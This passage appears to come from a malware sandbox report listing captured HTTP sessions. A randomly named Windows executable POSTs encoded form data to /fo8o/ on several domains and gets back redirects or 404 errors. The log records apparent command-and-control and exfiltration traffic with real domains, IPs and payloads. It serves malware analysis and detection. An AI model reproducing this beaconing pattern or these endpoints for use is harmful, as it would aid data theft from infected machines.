6f 64 75 54 36 70 72 49 4d 4c 74 61 57 67 4b 4a 39 62 42 4b 51 72 34 64 73 6e 79 4d 50 46 70 4d 51 6a 4a 4c 47 52 37 69 65 79 78 75 70 4f 53 70 76 31 48 62 66 55 61 4d 61 46 77 67 73 6d 67 6e 30 74 6a 4a 55 66 64 61 36 76 50 75 63 4b 58 67 6f 61 45 65 72 2f 49 33 62 4a 6d 4d 69 36 72 2b 76 43 79 4c 67 58 75 51 3d 3d 26 61 6d 70 3b 39 62 72 4c 5f 3d 42 54 68 50 65 30 53 30 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 68 32 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="https://www.goldenjade-travel.com/fo8o/?Y8F=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFwgsmgn0tjJUfda6vPucKXgoaEer/I3bJmMi6r+vCyLgXuQ==&9brL_=BThPe0S0">here</a>.</h2></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	65223	46.30.213.191	80	7152	C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe

Timestamp	Bytes transferred	Direction	Data
Jun 26, 2024 14:56:07.252346992 CEST	796	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.antonio-vivaldi.mobi Origin: http://www.antonio-vivaldi.mobi Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 204 Referer: http://www.antonio-vivaldi.mobi/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 59 38 46 3d 43 52 4e 5a 6a 69 7a 54 4b 44 54 64 6b 52 35 38 65 32 62 58 69 70 4f 6a 51 67 39 6e 58 49 5a 50 54 73 6a 6b 6e 6c 36 6b 56 4e 59 54 70 6e 41 61 59 37 75 74 36 56 71 57 44 58 49 4f 36 55 6f 74 53 70 6f 38 4f 56 2f 4e 4e 5a 53 39 32 39 6e 4c 43 63 50 43 44 48 4a 65 37 35 51 32 66 46 4f 70 35 50 7a 68 78 53 4f 58 48 69 4e 78 6d 7a 61 6d 6d 45 2f 4a 74 73 59 39 32 6c 49 62 39 6e 41 55 2b 67 6e 51 41 4b 75 6e 65 53 4e 74 6e 30 74 57 37 64 63 49 2f 48 79 63 76 4b 62 52 33 31 30 4f 6e 52 49 76 67 79 62 5a 4c 70 45 70 48 36 33 2f 41 36 49 73 63 6c 48 59 4f 79 66 4b 6a 37 6a 38 72 39 48 73 4f 49 51 3d Data Ascii: Y8F=CRNZjizTKDTdkR58e2bXipOjQg9nXIZPTsjknl6kVNYTpnAaY7ut6VqWDXIO6UotSpo8OV/NNZS929nLCcPCDHJe75Q2fFOp5PzhxSOXHiNxmzammE/JtsY92lIb9nAU+gnQAKuneSNtn0tW7dcI/HycvKbR310OnRIvgybZLpEpH63/A6IsclHYOyfKj7j8r9HsOIQ=
Jun 26, 2024 14:56:07.872384071 CEST	559	IN	HTTP/1.1 302 Found Cache-Control: max-age:600, public Content-Length: 163 Expires: Wed, 26 Jun 2024 13:06:07 GMT Last-Modified: Wed, 26 Jun 2024 12:56:07 GMT Location: https://musee.mobi/vivaldi/fo8o/ Date: Wed, 26 Jun 2024 12:56:07 GMT Content-Type: text/html; charset=utf-8 X-Onecom-Cluster-Name: X-Varnish: 591465583 Age: 0 Via: 1.1 webcache2 (Varnish/trunk) Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 20 22 68 74 74 70 73 3a 2f 2f 6d 75 73 65 65 2e 6d 6f 62 69 2f 76 69 76 61 6c 64 69 2f 66 6f 38 6f 2f 22 20 3e 68 65 72 65 3c 2f 61 3e 3c 2f 70 3e 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 09 Data Ascii: <!DOCTYPE html><html><head><title>Found</title></head><body><p>The document has moved <a href= "https://musee.mobi/vivaldi/fo8o/" >here</a></p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	65224	46.30.213.191	80	7152	C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe

Timestamp	Bytes transferred	Direction	Data
Jun 26, 2024 14:56:09.789356947 CEST	816	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.antonio-vivaldi.mobi Origin: http://www.antonio-vivaldi.mobi Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 224 Referer: http://www.antonio-vivaldi.mobi/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 59 38 46 3d 43 52 4e 5a 6a 69 7a 54 4b 44 54 64 32 69 68 38 63 56 7a 58 72 70 4f 73 4d 77 39 6e 63 6f 5a 4c 54 73 2f 6b 6e 6e 58 37 53 2f 4d 54 6f 46 49 61 62 35 47 74 2f 56 71 57 4c 33 49 50 33 30 6f 6b 53 70 6c 44 4f 55 44 4e 4e 5a 47 39 32 35 76 4c 43 76 33 4e 42 58 4a 51 77 5a 51 34 62 46 4f 70 35 50 7a 68 78 53 61 78 48 69 6c 78 6d 67 43 6d 6e 6c 2f 4b 7a 38 59 2b 78 6c 49 62 77 48 41 59 2b 67 6d 7a 41 4c 7a 38 65 55 52 74 6e 77 70 57 38 4d 63 4a 71 33 7a 58 78 36 61 42 36 46 46 79 35 43 45 64 74 68 2b 4f 61 4b 67 4f 43 4d 61 56 61 59 41 45 50 46 72 67 65 68 58 39 79 4c 43 56 78 65 58 63 51 66 45 68 52 44 42 4b 31 34 6d 71 57 63 42 4d 39 5a 67 5a 47 6a 4a 39 Data Ascii: Y8F=CRNZjizTKDTd2ih8cVzXrpOsMw9ncoZLTs/knnX7S/MToFIab5Gt/VqWL3IP30okSplDOUDNNZG925vLCv3NBXJQwZQ4bFOp5PzhxSaxHilxmgCmnl/Kz8Y+xlIbwHAY+gmzALz8eURtnwpW8McJq3zXx6aB6FFy5CEdth+OaKgOCMaVaYAEPFrgehX9yLCVxeXcQfEhRDBK14mqWcBM9ZgZGjJ9
Jun 26, 2024 14:56:10.432984114 CEST	559	IN	HTTP/1.1 302 Found Cache-Control: max-age:600, public Content-Length: 163 Expires: Wed, 26 Jun 2024 13:06:10 GMT Last-Modified: Wed, 26 Jun 2024 12:56:10 GMT Location: https://musee.mobi/vivaldi/fo8o/ Date: Wed, 26 Jun 2024 12:56:10 GMT Content-Type: text/html; charset=utf-8 X-Onecom-Cluster-Name: X-Varnish: 597067599 Age: 0 Via: 1.1 webcache2 (Varnish/trunk) Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 20 22 68 74 74 70 73 3a 2f 2f 6d 75 73 65 65 2e 6d 6f 62 69 2f 76 69 76 61 6c 64 69 2f 66 6f 38 6f 2f 22 20 3e 68 65 72 65 3c 2f 61 3e 3c 2f 70 3e 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 09 Data Ascii: <!DOCTYPE html><html><head><title>Found</title></head><body><p>The document has moved <a href= "https://musee.mobi/vivaldi/fo8o/" >here</a></p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	65225	46.30.213.191	80	7152	C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe

Timestamp	Bytes transferred	Direction	Data
Jun 26, 2024 14:56:12.319386959 CEST	1833	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.antonio-vivaldi.mobi Origin: http://www.antonio-vivaldi.mobi Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1240 Referer: http://www.antonio-vivaldi.mobi/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 59 38 46 3d 43 52 4e 5a 6a 69 7a 54 4b 44 54 64 32 69 68 38 63 56 7a 58 72 70 4f 73 4d 77 39 6e 63 6f 5a 4c 54 73 2f 6b 6e 6e 58 37 53 2f 30 54 70 77 45 61 62 65 79 74 34 56 71 57 42 58 49 43 33 30 70 32 53 70 73 4b 4f 55 50 64 4e 63 43 39 30 65 76 4c 45 65 33 4e 62 48 4a 51 2f 35 51 31 66 46 4f 77 35 4c 66 6c 78 53 4b 78 48 69 6c 78 6d 6d 47 6d 67 30 2f 4b 30 4d 59 39 32 6c 49 66 39 6e 42 78 2b 67 2f 49 41 4c 6e 73 65 43 68 74 6d 55 4e 57 35 36 49 4a 32 6e 7a 56 77 36 62 45 36 46 4a 58 35 43 5a 6d 74 67 4b 6f 61 4a 77 4f 43 71 33 36 4a 71 41 44 4f 47 6d 59 51 54 54 4d 6c 75 47 71 75 75 4c 70 4b 4e 46 44 53 77 68 2b 30 2f 2b 72 54 39 4a 47 69 73 38 63 4b 58 55 38 73 54 4d 77 61 33 38 63 74 35 64 64 35 64 49 35 56 39 4d 39 66 4d 35 61 31 37 58 63 55 4b 44 7a 55 6c 2f 78 33 36 52 32 49 4e 4f 62 4f 45 70 62 4e 39 2f 4f 67 4c 67 32 4c 42 78 68 74 77 30 43 77 4b 6b 4a 68 38 37 4c 4d 62 43 54 58 38 72 54 63 77 74 4b 76 58 53 61 6b 77 69 73 61 6e 55 72 2f 47 6d 49 74 33 52 4b 39 36 62 50 2b 69 66 78 51 57 [TRUNCATED] Data Ascii: Y8F=CRNZjizTKDTd2ih8cVzXrpOsMw9ncoZLTs/knnX7S/0TpwEabeyt4VqWBXIC30p2SpsKOUPdNcC90evLEe3NbHJQ/5Q1fFOw5LflxSKxHilxmmGmg0/K0MY92lIf9nBx+g/IALnseChtmUNW56IJ2nzVw6bE6FJX5CZmtgKoaJwOCq36JqADOGmYQTTMluGquuLpKNFDSwh+0/+rT9JGis8cKXU8sTMwa38ct5dd5dI5V9M9fM5a17XcUKDzUl/x36R2INObOEpbN9/OgLg2LBxhtw0CwKkJh87LMbCTX8rTcwtKvXSakwisanUr/GmIt3RK96bP+ifxQWkrPZduiYh/QDByfmTs3OolUKqZbiP8yyqVs1pJg64J5EYbpThc6Ak1/jUoVr5bOq3a/POoshmo1bHhdgEx2xzp/qwEGukTMA3RN1z6VZ3P7p+7eWqqWjcx/eJv/b5clHrjV8rz0NVXHFjj3vZOjPS9JcmUdCUd2RCmaNBv1Am7Kua3lW9ZaJEtUBCusDfi9RR7vEnKxcmcIdpKOF1O0y1cSsss27AM99fF1YUtiB+kCVXlxRWQC87mP0DNDnU9YmT8C4ihzJckT+49ucFxf9AuZ9Iv5fQL5Spq1xhGAsqzVkB31efCcEVxd4t+eo9XgeZBoKlK8Se7JCFE1pyqrJIP2Heq9zRwXBwtzV5hNLEpnuO6L23uCovGnu32ztgvSPSDAPVZBkxjb/MhNLRp4w/ZZjT2nMkSDS3IPMJJAxqifADP0wtOLDqgSewULA+feddhBDb0aRJDJdzdYvKlhHPF9Nv2y8X3d16i0Nv3XyGyEx0LjYIGDwO0TOSzGQsfrpH0sbL+HM7Kggp90V4bxbzD2hjb3o5JsSTGjQkKRRAEFDV+ke53okQCcgu2kt+pkj6qjA0LV3g6O6r5nZEuh3F6nkW2xZgDwSwdpyUWHsoe2NxGOxzshoGFxonvTt8DiZ7TNOTimJRcLTV0b3f7yk4OPgeMhKsAqSh0 [TRUNCATED]
Jun 26, 2024 14:56:12.954638004 CEST	559	IN	HTTP/1.1 302 Found Cache-Control: max-age:600, public Content-Length: 163 Expires: Wed, 26 Jun 2024 13:06:12 GMT Last-Modified: Wed, 26 Jun 2024 12:56:12 GMT Location: https://musee.mobi/vivaldi/fo8o/ Date: Wed, 26 Jun 2024 12:56:12 GMT Content-Type: text/html; charset=utf-8 X-Onecom-Cluster-Name: X-Varnish: 574787967 Age: 0 Via: 1.1 webcache2 (Varnish/trunk) Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 20 22 68 74 74 70 73 3a 2f 2f 6d 75 73 65 65 2e 6d 6f 62 69 2f 76 69 76 61 6c 64 69 2f 66 6f 38 6f 2f 22 20 3e 68 65 72 65 3c 2f 61 3e 3c 2f 70 3e 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 09 Data Ascii: <!DOCTYPE html><html><head><title>Found</title></head><body><p>The document has moved <a href= "https://musee.mobi/vivaldi/fo8o/" >here</a></p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	65226	46.30.213.191	80	7152	C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe

Timestamp	Bytes transferred	Direction	Data
Jun 26, 2024 14:56:14.855256081 CEST	523	OUT	GET /fo8o/?Y8F=PTl5gU/3CD/Xhg5Nd1HWi+eKOiJURJRFTZuVmm6gfrwSjnBrSraU/0GdHAsD0mFxNrARF0zWd8CLwvHKbs6Zb05UwcAkaB2J1Kzvv1yGe3hS8juJnkbDr/1EuGpo+UJ9gA==&9brL_=BThPe0S0 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.antonio-vivaldi.mobi Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Jun 26, 2024 14:56:15.495475054 CEST	875	IN	HTTP/1.1 302 Found Cache-Control: max-age:600, public Content-Length: 327 Expires: Wed, 26 Jun 2024 13:06:15 GMT Last-Modified: Wed, 26 Jun 2024 12:56:15 GMT Date: Wed, 26 Jun 2024 12:56:15 GMT Content-Type: text/html; charset=utf-8 location: https://musee.mobi/vivaldi/fo8o/?Y8F=PTl5gU/3CD/Xhg5Nd1HWi+eKOiJURJRFTZuVmm6gfrwSjnBrSraU/0GdHAsD0mFxNrARF0zWd8CLwvHKbs6Zb05UwcAkaB2J1Kzvv1yGe3hS8juJnkbDr/1EuGpo+UJ9gA==&9brL_=BThPe0S0 X-Onecom-Cluster-Name: X-Varnish: 387528322 Age: 0 Via: 1.1 webcache2 (Varnish/trunk) Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 20 22 68 74 74 70 73 3a 2f 2f 6d 75 73 65 65 2e 6d 6f 62 69 2f 76 69 76 61 6c 64 69 2f 66 6f 38 6f 2f 3f 59 38 46 3d 50 54 6c 35 67 55 2f 33 43 44 2f 58 68 67 35 4e 64 31 48 57 69 26 23 34 33 3b 65 4b 4f 69 4a 55 52 4a 52 46 54 5a 75 56 6d 6d 36 67 66 72 77 53 6a 6e 42 72 53 72 61 55 2f 30 47 64 48 41 73 44 30 6d 46 78 4e 72 41 52 46 30 7a 57 64 38 43 4c 77 76 48 4b 62 73 36 5a 62 30 35 55 77 63 41 6b 61 42 32 4a 31 4b 7a 76 76 31 79 47 65 33 68 53 38 6a 75 4a 6e 6b 62 44 72 2f 31 45 75 47 70 6f 26 23 34 33 3b 55 4a 39 67 41 3d 3d 26 61 6d 70 3b 39 62 72 4c 5f 3d 42 54 68 50 65 30 53 30 22 20 3e 68 65 72 65 3c 2f 61 3e 3c 2f 70 3e 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 09 Data Ascii: <!DOCTYPE html><html><head><title>Found</title></head><body><p>The document has moved <a href= "https://musee.mobi/vivaldi/fo8o/?Y8F=PTl5gU/3CD/Xhg5Nd1HWi+eKOiJURJRFTZuVmm6gfrwSjnBrSraU/0GdHAsD0mFxNrARF0zWd8CLwvHKbs6Zb05UwcAkaB2J1Kzvv1yGe3hS8juJnkbDr/1EuGpo+UJ9gA==&9brL_=BThPe0S0" >here</a></p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	65227	85.159.66.93	80	7152	C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe

Timestamp	Bytes transferred	Direction	Data
Jun 26, 2024 14:56:20.685163975 CEST	778	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.magmadokum.com Origin: http://www.magmadokum.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 204 Referer: http://www.magmadokum.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 59 38 46 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 62 4a 72 44 58 6d 7a 45 6b 6b 4b 2b 65 41 4e 6a 6e 42 2f 58 63 78 41 41 64 50 47 4a 53 64 6c 77 41 6f 2b 4c 59 71 50 65 6a 7a 49 30 2b 38 47 36 31 68 36 56 71 51 5a 2f 6e 41 31 35 43 52 7a 30 6f 38 31 47 64 7a 57 32 62 6b 49 42 59 36 52 64 37 4f 63 4a 47 69 32 32 38 68 6b 69 56 41 77 4b 42 66 6f 6d 64 51 57 2f 43 53 33 4a 47 2f 59 53 5a 70 63 58 66 74 30 42 75 77 6c 44 43 67 4f 4f 50 7a 4a 35 30 6b 54 61 43 73 48 69 48 6b 71 2f 30 30 2b 52 30 48 43 46 59 72 4d 39 61 51 75 33 56 78 63 4f 51 38 59 6d 39 5a 44 32 48 32 7a 46 43 44 33 67 72 48 6b 72 34 47 4d 3d Data Ascii: Y8F=nJfHJZySQmokbJrDXmzEkkK+eANjnB/XcxAAdPGJSdlwAo+LYqPejzI0+8G61h6VqQZ/nA15CRz0o81GdzW2bkIBY6Rd7OcJGi228hkiVAwKBfomdQW/CS3JG/YSZpcXft0BuwlDCgOOPzJ50kTaCsHiHkq/00+R0HCFYrM9aQu3VxcOQ8Ym9ZD2H2zFCD3grHkr4GM=
Jun 26, 2024 14:56:21.440620899 CEST	225	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.1 Date: Wed, 26 Jun 2024 12:56:21 GMT Content-Length: 0 Connection: close X-Rate-Limit-Limit: 5s X-Rate-Limit-Remaining: 19 X-Rate-Limit-Reset: 2024-06-26T12:56:26.3183935Z

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	65228	85.159.66.93	80	7152	C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe

Timestamp	Bytes transferred	Direction	Data
Jun 26, 2024 14:56:23.227488995 CEST	798	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.magmadokum.com Origin: http://www.magmadokum.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 224 Referer: http://www.magmadokum.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 59 38 46 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 61 71 44 44 56 42 76 45 6a 45 4b 2f 62 41 4e 6a 74 68 2f 54 63 78 38 41 64 4d 4c 55 54 6f 39 77 41 4a 69 4c 57 4c 50 65 67 7a 49 30 6d 73 47 2f 72 52 36 4f 71 51 55 63 6e 42 4a 35 43 52 50 30 6f 2b 74 47 65 44 71 31 61 30 49 44 56 61 52 44 6d 65 63 4a 47 69 32 32 38 68 67 49 56 41 6f 4b 42 4c 55 6d 53 56 71 77 4d 79 33 49 57 76 59 53 64 70 63 54 66 74 30 7a 75 78 49 6d 43 6c 43 4f 50 79 35 35 30 31 54 46 58 63 48 6b 44 6b 72 4c 38 55 6a 67 35 30 4b 35 45 36 30 35 44 6d 65 33 51 48 78 6b 4b 65 51 4f 75 35 76 4f 58 6c 37 79 54 7a 57 4a 78 6b 30 62 6d 52 59 7a 74 32 69 4e 73 77 7a 43 76 35 30 4d 4d 4a 7a 30 64 67 68 67 Data Ascii: Y8F=nJfHJZySQmokaqDDVBvEjEK/bANjth/Tcx8AdMLUTo9wAJiLWLPegzI0msG/rR6OqQUcnBJ5CRP0o+tGeDq1a0IDVaRDmecJGi228hgIVAoKBLUmSVqwMy3IWvYSdpcTft0zuxImClCOPy5501TFXcHkDkrL8Ujg50K5E605Dme3QHxkKeQOu5vOXl7yTzWJxk0bmRYzt2iNswzCv50MMJz0dghg
Jun 26, 2024 14:56:23.968946934 CEST	225	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.1 Date: Wed, 26 Jun 2024 12:56:23 GMT Content-Length: 0 Connection: close X-Rate-Limit-Limit: 5s X-Rate-Limit-Remaining: 18 X-Rate-Limit-Reset: 2024-06-26T12:56:26.3183935Z

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	65229	85.159.66.93	80	7152	C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe

Timestamp	Bytes transferred	Direction	Data
Jun 26, 2024 14:56:25.758449078 CEST	1815	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.magmadokum.com Origin: http://www.magmadokum.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1240 Referer: http://www.magmadokum.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 59 38 46 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 61 71 44 44 56 42 76 45 6a 45 4b 2f 62 41 4e 6a 74 68 2f 54 63 78 38 41 64 4d 4c 55 54 6f 31 77 42 37 71 4c 57 73 54 65 76 54 49 30 76 4d 47 2b 72 52 36 44 71 52 39 56 6e 42 46 70 43 58 4c 30 71 64 6c 47 66 78 4f 31 52 30 49 44 4a 71 52 43 37 4f 63 6d 47 69 6d 79 38 67 51 49 56 41 6f 4b 42 4e 77 6d 62 67 57 77 4f 79 33 4a 47 2f 59 6b 5a 70 64 32 66 74 38 6a 75 78 4e 54 43 52 2b 4f 4d 53 70 35 35 6a 2f 46 56 38 48 6d 45 6b 72 54 38 55 76 37 35 30 6e 56 45 36 42 55 44 68 79 33 54 69 55 4d 61 73 73 6d 71 37 43 70 61 30 37 78 54 57 4b 4d 33 48 64 70 76 79 6b 44 69 48 69 48 36 48 4c 46 69 4b 68 63 65 38 72 2b 54 30 59 77 4c 51 43 4e 33 73 52 45 68 32 64 6f 47 4d 63 6e 49 67 53 73 4a 32 4b 71 68 33 30 78 30 4b 4d 52 54 4f 4f 67 38 54 78 55 44 54 31 61 67 53 4a 65 41 49 33 38 77 37 74 69 2b 73 6b 58 6d 4d 4b 2f 55 2f 4a 4d 4f 73 39 61 51 49 70 78 55 77 32 4d 67 4d 47 39 78 67 77 68 57 74 75 72 44 7a 73 68 43 41 76 54 6d 64 50 70 2f 70 2b 44 33 6b 6f 64 32 6c [TRUNCATED] Data Ascii: Y8F=nJfHJZySQmokaqDDVBvEjEK/bANjth/Tcx8AdMLUTo1wB7qLWsTevTI0vMG+rR6DqR9VnBFpCXL0qdlGfxO1R0IDJqRC7OcmGimy8gQIVAoKBNwmbgWwOy3JG/YkZpd2ft8juxNTCR+OMSp55j/FV8HmEkrT8Uv750nVE6BUDhy3TiUMassmq7Cpa07xTWKM3HdpvykDiHiH6HLFiKhce8r+T0YwLQCN3sREh2doGMcnIgSsJ2Kqh30x0KMRTOOg8TxUDT1agSJeAI38w7ti+skXmMK/U/JMOs9aQIpxUw2MgMG9xgwhWturDzshCAvTmdPp/p+D3kod2l+4YvNn23tJipx85/rQsbb3tgjLhyi4g5fehCShG7oCKTUnlOGH7C/MLlLCFBepNCelwLd4FLiBoORpWPOJduHh5uXpVuvEsxDtqlVHzP4C83V2BciD6jh4S6IfuEsb550muWnceqjpZzyLMUjqSspZqRKhzaqChBo0BSgiACGCO3NiS+toURxH1cbr4Asre4PUxzDj75BwPzFCgslxA5RscTk4WEk+bCRmOaNg30J49XkrSmC4X/iGbLstKZ/+TwHfwDWCbdQ6zApgNjvoTYeR8Hw1dGOQFcFPta/FQ2Stmx9P86MQwPjea3KS4PVUJS0mUBOaht/UPFEay20NWWi+fqfZG/d2d5TndsbuTUZ1XkAQwkco/3d1C4d3IIm85c+Isp2iJHtRPm0PCDOGoFuWr9zbjbI6mC2oo+9mtb82rZwgxWvBcEqSIoPgX68mpMXfB+GxS8wiAVIg6LcZ43JTeSUmEdWOS9n2l23pEkKGCckJdweFIbk2pBKrxDA4pPfGW5AuMvs+uRkDTNdlWS/4bXYqJV1TJ/SsX72SRqzRbaJd6Z0105PebcTu+euDbNQuFvyY1FEwvx+MGzmrDE747BBulIm5nTvGgehCJqH8jghMMedUadcLcHLEgKBZebl+VoSnbQN7j2txb1iNWNBZagGJ2RM8FxMZ [TRUNCATED]
Jun 26, 2024 14:56:26.523169041 CEST	225	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.1 Date: Wed, 26 Jun 2024 12:56:26 GMT Content-Length: 0 Connection: close X-Rate-Limit-Limit: 5s X-Rate-Limit-Remaining: 19 X-Rate-Limit-Reset: 2024-06-26T12:56:31.4099707Z

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	65230	85.159.66.93	80	7152	C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe

Timestamp	Bytes transferred	Direction	Data
